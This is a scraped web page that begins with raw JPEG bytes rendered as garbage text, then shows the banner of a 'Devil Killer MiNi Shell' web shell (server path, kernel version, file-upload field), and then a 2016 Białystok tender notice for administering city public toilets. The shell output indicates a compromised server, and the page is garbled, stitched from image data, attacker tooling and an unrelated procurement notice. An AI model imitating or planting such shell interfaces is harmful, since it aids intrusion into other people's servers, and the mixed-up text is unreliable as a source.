JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160304/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160304/49474-N-2016.html

<p class="kh_header"><b>Białystok: Administrowanie szaletami miejskimi położonymi na terenie miasta Białegostoku</b><br>
<b>Numer ogłoszenia: 49474 - 2016; data zamieszczenia: 04.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białystok , ul. Słonimska 1, 15-950 Białystok, woj. podlaskie, tel. 085 869 60 02, faks 085 869 62 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Administrowanie szaletami miejskimi położonymi na terenie miasta Białegostoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest administrowanie szaletem miejskim położonym 
przy ul. M. Skłodowskiej - Curie oraz automatycznymi toaletami wolnostojącymi zlokalizowanymi przy skwerze im. Tamary Sołoniewicz, w Parku Planty, przy ul. Boh. Monte Cassino w Parku im. J. Dziekońskiej w Białymstoku.
2. Zakres prac:
1) związanych z administrowaniem szaletem miejskim przy ul. M. Skłodowskiej - Curie w Białymstoku:
a) zapewnienie funkcjonowania szaletu w godz. 8.00 - 18:00,
b) utrzymanie szaletu w warunkach zgodnych z wymogami sanitarnymi, 
c) umożliwianie przeprowadzenia kontroli przez pracowników Państwowej Inspekcji Sanitarnej oraz niezwłoczne wykonywanie zaleceń Państwowej Inspekcji Sanitarnej,
d) pokrywanie kosztów kontroli Państwowej Inspekcji Sanitarnej,
e) zapewnienie środków czystości, 
f) bieżące uzupełnianie papieru toaletowego i mydła, 
g) malowanie ścian całościowe jeden raz w okresie obowiązywania umowy oraz punktowe w przypadku stwierdzenia zabrudzeń, graffiti itp. w terminie wskazanym przez Zamawiającego,
h) malowanie poręczy schodów całościowe jeden raz w okresie obowiązywania umowy w terminie wskazanym przez Zamawiającego,
i) wykonywanie napraw (usuwanie awarii) w czasie do 48 godz. od zlecenia przez Zamawiającego w zakresie:  
- naprawy zamków, 
- wymiany uszczelek,
- naprawy w przypadku uszkodzenia instalacji sanitarnej, wodociągowej, elektrycznej,
- wymiany drobnych urządzeń instalacji elektrycznej np. bezpieczników, żarówek, świetlówek, kontaktów, włączników,
- wstawianie kratek wentylacyjnych  w przypadku ich zniszczenia lub kradzieży, 
j) przestrzeganie przepisów BHP i ppoż. na terenie obiektu, 
k) zabezpieczenie obiektów od kradzieży i ognia, 
l) utrzymanie ciągów pieszych (sprzątanie, odśnieżanie, likwidacja śliskości) bezpośrednio prowadzących do szaletu i otaczających szalet, 
m) bieżące likwidowanie wszelkich napisów na ścianach (wewnątrz i z zewnątrz obiektu), 
n) zgłaszanie Zamawiającemu każdorazowo wszelkich kradzieży i aktów wandalizmu,
o) wykonanie pomiaru rezystancji izolacji i skuteczności ochrony przeciwporażeniowej w terminie 01 września do dnia 31 października 2016 r., 
p) niezwłoczne wykonanie zaleceń dokonującego pomiary, o których mowa w lit. o, oraz dostarczenie Zamawiającemu protokołu z pomiarów do dnia 15 listopada 2016 r., 
q) prowadzenie książki obiektów budowlanych zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie książek obiektu budowlanego 
(Dz. U. Nr 120, poz. 1134), 
r) zawarcie umowy na dostawę wody i odprowadzanie ścieków oraz na dostawę energii elektrycznej,
s) pokrycie kosztów zużycia energii elektrycznej, wody i odprowadzania ścieków, oraz wywozu odpadów,
t) pobieranie opłat za korzystanie z szaletu stanowiących dochód budżetu Miasta Białegostoku (pobieranie osobiste);
2) związanych z administrowaniem toaletą wolnostojącą przy skwerze im. Tamary Sołoniewicz w Białymstoku:
a) zapewnienie funkcjonowania szaletu przez całą dobę, 
b) utrzymanie szaletu w warunkach zgodnych z wymogami sanitarnymi, 
c) co najmniej jednokrotne w ciągu dnia mycie i dezynfekcja urządzeń sanitarnych, 
d) umożliwienie przeprowadzenia kontroli przez pracowników Państwowej Inspekcji Sanitarnej oraz niezwłoczne wykonywanie zaleceń kontroli Państwowej Inspekcji Sanitarnej,
e) pokrycie kosztów kontroli Państwowej Inspekcji Sanitarnej,
f) zapewnienie środków czystości, 
g) bieżące uzupełnianie papieru toaletowego i mydła, 
h) malowanie ścian w przypadku stwierdzenia zniszczeń, graffiti itp. w terminie 
wskazanym przez Zamawiającego,
i) naprawa wrzutnika monet w terminie wskazanym przez Zamawiającego
j) wykonywanie napraw (usuwanie awarii) w czasie do 48 godz. od zlecenia przez Zamawiającego w zakresie:  
- wymiany uszczelek,
- naprawy zamków, 
- naprawy w przypadku uszkodzenia instalacji sanitarnej, wodociągowej, elektrycznej,
- wymiany drobnych urządzeń instalacji elektrycznej np. bezpieczników, żarówek, świetlówek, kontaktów, włączników,
- wstawianie kratek wentylacyjnych  w przypadku ich zniszczenia lub kradzieży, 
k) przestrzeganie przepisów BHP i ppoż. na terenie obiektu, 
l) zabezpieczenie obiektów od kradzieży i ognia, 
m) utrzymanie ciągów pieszych (sprzątanie, odśnieżanie, likwidacja śliskości) bezpośrednio prowadzących do szaletu i otaczających szalet, 
n) oczyszczanie rur spustowych, daszku nad drzwiami i dachu z liści, wiatrołomów 
i nadmiaru śniegu, 
o) bieżące likwidowanie wszelkich napisów na ścianach (wewnątrz i zewnątrz obiektu),
p) mycie obiektu (ścian zewnętrznych i gabloty) co najmniej dwa razy w miesiącu,
q) zgłaszanie Zamawiającemu każdorazowo wszelkich kradzieży i aktów wandalizmu,
r) wykonanie pomiaru rezystancji izolacji i skuteczności ochrony przeciwporażeniowej w terminie 01 września do dnia 31 października 2016 r., 
s) niezwłoczne wykonanie zaleceń dokonującego pomiary, o których mowa w lit. r oraz dostarczenie Zamawiającemu protokołu z pomiarów do dnia 15 listopada 2016 r., 
t) prowadzenie książek obiektów budowlanych zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie książki obiektu budowlanego 
(Dz. U. Nr 120, poz. 1134), 
u) reagowanie na interwencje w zakresie funkcjonowania obiektu, w tym użycie alarmu, 
v) zawarcie umowy na dostawę wody i odprowadzanie ścieków oraz na dostawę energii, 
w) pokrywanie kosztów zużycia energii elektrycznej, wody i odprowadzania ścieków oraz wywozu odpadów, 
x) cykliczne sprawdzanie stanu naładowania karty w module monitoringu i jej doładowywanie zapewniające ciągłość działania systemu,
y) pobieranie opłat za korzystanie z szaletu stanowiących dochód budżetu Miasta Białegostoku (wrzutnik monet);
3) związanych z administrowaniem toaletą wolnostojącą w Parku Planty 
w Białymstoku:
a) zapewnienie funkcjonowania szaletu przez całą dobę, 
b) utrzymanie szaletu w warunkach zgodnych z wymogami sanitarnymi, 
c) co najmniej jednokrotne (w okresie od dnia 1 kwietnia do dnia 30 września 
co najmniej dwukrotne) w ciągu dnia mycie i dezynfekcja urządzeń sanitarnych, 
d) umożliwienie przeprowadzenia kontroli przez pracowników Państwowej Inspekcji Sanitarnej oraz niezwłoczne wykonywanie zaleceń kontroli Państwowej Inspekcji Sanitarnej,
e) pokrycie kosztów kontroli Państwowej Inspekcji Sanitarnej, 
f) zapewnienie środków czystości, 
g) bieżące uzupełnianie papieru toaletowego i mydła, 
h) malowanie ścian w przypadku stwierdzenia zniszczeń, graffiti itp. w terminie wskazanym przez Zamawiającego,
i) naprawa wrzutnika monet w terminie wskazanym przez Zamawiającego,
j) wykonywanie napraw (usuwanie awarii) w czasie do 48 godz. od zlecenia przez Zamawiającego w zakresie:  
- wymiany uszczelek,
- naprawy zamków, 
- naprawy w przypadku uszkodzenia instalacji sanitarnej, wodociągowej, elektrycznej,
- wymiany drobnych urządzeń instalacji elektrycznej np. bezpieczników, żarówek, świetlówek, kontaktów, włączników,
- wstawianie kratek wentylacyjnych  w przypadku ich zniszczenia lub kradzieży, 
k) przestrzeganie przepisów BHP i ppoż. na terenie obiektu, 
l) zabezpieczenie obiektów od kradzieży i ognia, 
m) utrzymanie ciągów pieszych (sprzątanie, odśnieżanie, likwidacja śliskości) bezpośrednio prowadzących do szaletu i otaczających szalet, 
n) oczyszczanie rur spustowych, daszku nad drzwiami i dachu z liści, wiatrołomów 
i nadmiaru śniegu, 
o) bieżące likwidowanie wszelkich napisów na ścianach (wewnątrz i zewnątrz obiektu),
p) mycie obiektu (ścian zewnętrznych i gabloty) co najmniej dwa razy w miesiącu,
q) zgłaszanie Zamawiającemu każdorazowo wszelkich kradzieży i aktów wandalizmu,
r) wykonanie pomiaru rezystancji izolacji i skuteczności ochrony przeciwporażeniowej w terminie 01 września do dnia 31 października 2016 r., 
s) niezwłoczne wykonanie zaleceń dokonującego pomiary, o których mowa w lit. r    oraz dostarczenie Zamawiającemu protokołu z pomiarów do dnia 15 listopada 2016 r.,
t) prowadzenie książek obiektów budowlanych zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie książki obiektu budowlanego 
(Dz. U. Nr 120, poz. 1134), 
u) reagowanie na interwencje w zakresie funkcjonowania obiektu, w tym użycie alarmu,
v) pokrywanie kosztów wywozu odpadów,
w) pobieranie opłat za korzystanie z szaletu stanowiących dochód budżetu Miasta Białegostoku (wrzutnik monet);
4) związanych z administrowaniem toaletą wolnostojącą przy ul. Boh. Monte Cassino w Parku im. J. Dziekońskiej  w Białymstoku:
a) zapewnienie funkcjonowania szaletu przez całą dobę,
b) utrzymanie szaletu w warunkach zgodnych z wymogami sanitarnymi,
c) co najmniej jednokrotne (w okresie od dnia 1 kwietnia do dnia 30 września 
co najmniej dwukrotne) w ciągu dnia mycie i dezynfekcja urządzeń sanitarnych,
d) umożliwianie przeprowadzenia kontroli przez pracowników Państwowej Inspekcji Sanitarnej oraz niezwłoczne wykonywanie zaleceń Państwowej Inspekcji Sanitarnej,
e) pokrywanie kosztów kontroli Państwowej Inspekcji Sanitarnej,
f) zapewnienie środków czystości,
g) bieżące uzupełnianie papieru toaletowego i mydła, 
h) malowanie ścian w przypadku stwierdzenia zniszczeń, graffiti itp. w terminie 
skazanym przez Zamawiającego,
i)  naprawa wrzutnika monet w terminie wskazanym przez Zamawiającego,
j) wykonywanie napraw (usuwanie awarii) w czasie do 48 godz. od zlecenia przez Zamawiającego w zakresie:  
- wymiany uszczelek,
- naprawy zamków, 
- naprawy w przypadku uszkodzenia instalacji sanitarnej, wodociągowej, elektrycznej,
- wymiany drobnych urządzeń instalacji elektrycznej np. bezpieczników, żarówek, świetlówek, kontaktów, włączników,
- wstawianie kratek wentylacyjnych  w przypadku ich zniszczenia lub kradzieży,
k) przestrzeganie przepisów BHP i ppoż. na terenie obiektu,
l) zabezpieczenie obiektów od kradzieży i ognia, 
m) utrzymanie ciągów pieszych (sprzątanie, odśnieżanie, likwidacja śliskości) bezpośrednio prowadzących do szaletu i otaczających szalet,
n) oczyszczanie rur spustowych, daszku nad drzwiami i dachu z liści, wiatrołomów 
i nadmiaru śniegu,
o) bieżące likwidowanie wszelkich napisów na ścianach (wewnątrz i z zewnątrz obiektu),
p) mycie obiektu (ścian zewnętrznych i gabloty) co najmniej raz w miesiącu,
q) reagowanie na interwencje w zakresie funkcjonowania obiektu - użycie alarmu,  
r) zawarcie umowy na dostawę wody i odprowadzanie ścieków oraz na dostawę energii,
s) pokrywanie kosztów zużycia energii elektrycznej, wody i odprowadzania ścieków oraz wywozu nieczystości stałych,
t) cykliczne sprawdzanie stanu naładowania karty w module monitoringu i jej doładowywanie zapewniające ciągłość działania systemu,
u) wykonanie pomiaru rezystancji izolacji i skuteczności ochrony  
przeciwporażeniowej w terminie 01 września do dnia 31 października 2016 r., 
v) niezwłoczne wykonanie zaleceń dokonującego pomiary, o których mowa w lit. u, oraz dostarczenie Zamawiającemu protokołu z pomiarów do dnia 15 listopada    
2016 r.,
w) prowadzenie książek obiektów budowlanych zgodnie z Rozporządzeniem Ministra 
Infrastruktury z dnia 3 lipca 2003 r. w sprawie książki obiektu budowlanego    
(Dz. U. Nr 120, poz. 1134),
x) pobieranie opłat za korzystanie z szaletu stanowiących dochód budżetu Miasta Białegostoku (wrzutnik monet).
3. Wykaz wyposażenia ww. obiektów zawiera zał. nr 1 do siwz.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje zamówienia uzupełniające w wysokości do 30% wartości zamówienia podstawowego, o których mowa w art. 67 ust. 1 pkt 6 ustawy, polegające na powtórzeniu tego samego rodzaju zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokumenty podmiotów zagranicznych:
1) jeżeli w kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca 
ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w Sekcji III.4.3.1) tiret 1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem;
2) dokument, o którym mowa w Sekcji III.4.3.1) tiret 1 lub zastępujący go dokument, o którym mowa w ppkt 1, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3) w przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu. 
2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1) każdy Wykonawca zobowiązany jest złożyć oddzielnie dokumenty określone 
w Sekcji III.4.2) tiret 2 oraz Sekcji III.4.4) tiret 1;
2) oświadczenie o spełnieniu warunków udziału w postępowaniu określone w Sekcji III.4.1) oraz oświadczenie o niepodleganiu wykluczeniu określone 
w Sekcji III.4.2) tiret 1 składa pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z Wykonawców oddzielnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Czas wykonywania napraw (usuwania awarii) - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej 
pod rygorem nieważności i będą dopuszczalne w granicach unormowania art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2015 r. poz. 2164). 
2. Zamawiający dopuszcza zmianę wysokości wynagrodzenia należnego Wykonawcy w przypadku zmiany:
1) stawki podatku VAT, wprowadzonej powszechnie obowiązującymi przepisami prawa, z tym, że cena netto nie może ulec podwyższeniu;
2) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 
ust. 3 - 5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu 
za pracę;
3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne
- jeżeli zmiany te będą miały wpływ na koszty wykonania przez Wykonawcę zamówienia publicznego, wynikającego z zawartej umowy, każda ze stron umowy, w terminie od dnia opublikowania przepisów dokonujących tych zmian do 30 dnia od dnia ich wejścia w życie, może zwrócić się do drugiej strony o przeprowadzenie negocjacji w sprawie odpowiedniej zmiany wynagrodzenia. Zmiana umowy na podstawie ustaleń negocjacyjnych może nastąpić po wejściu w życie przepisów będących przyczyną waloryzacji.
3. W razie zmiany, o której mowa w pkt 2 ppkt 2, przez pojęcie odpowiedniej zmiany wynagrodzenia należy rozumieć sumę wzrostu kosztów Wykonawcy zamówienia publicznego wynikających z podwyższenia wynagrodzeń poszczególnych pracowników biorących udział w realizacji pozostałej do wykonania, w momencie wejścia w życie zmiany, części zamówienia, do wysokości wynagrodzenia minimalnego obowiązującej po zmianie przepisów lub jej odpowiedniej części, w przypadku osób zatrudnionych w wymiarze niższym niż pełen etat.
4. W razie zmiany wskazanej w pkt 2 ppkt 3, przez pojęcie odpowiedniej zmiany wynagrodzenia należy rozumieć sumę wzrostu kosztów Wykonawcy zamówienia publicznego oraz drugiej strony umowy o pracę lub innej umowy cywilnoprawnej łączącej wykonawcę zamówienia publicznego z osobą fizyczną nieprowadzącą działalności gospodarczej, wynikających z konieczności odprowadzenia dodatkowych składek od wynagrodzeń osób zatrudnionych na umowę o pracę lub na podstawie innej umowy cywilnoprawnej zawartej przez wykonawcę z osobą fizyczną nieprowadzącą działalności gospodarczej, a biorących udział w realizacji pozostałej do wykonania, w momencie wejścia w życie zmiany, części zamówienia przy założeniu braku zmiany wynagrodzenia netto tych osób.
5. Zamawiający dopuszcza możliwość całkowitego wyłączenia danego obiektu 
z administrowania, np. z powodu przebudowy, sprzedaży działki, na której 
zlokalizowany jest szalet miejski. W okresie wyłączenia obiektu z administrowania 
nie będzie przysługiwało Wykonawcy miesięczne wynagrodzenie ryczałtowe 
za administrowanie szaletem, o którym mowa w § 7 ust. 1 pkt 1 - 4 umowy.
6. W związku ze zmianami, o których mowa w pkt 2-5, dopuszcza się zmianę ogólnej wartości umowy brutto, określonej w § 7 ust. 3.
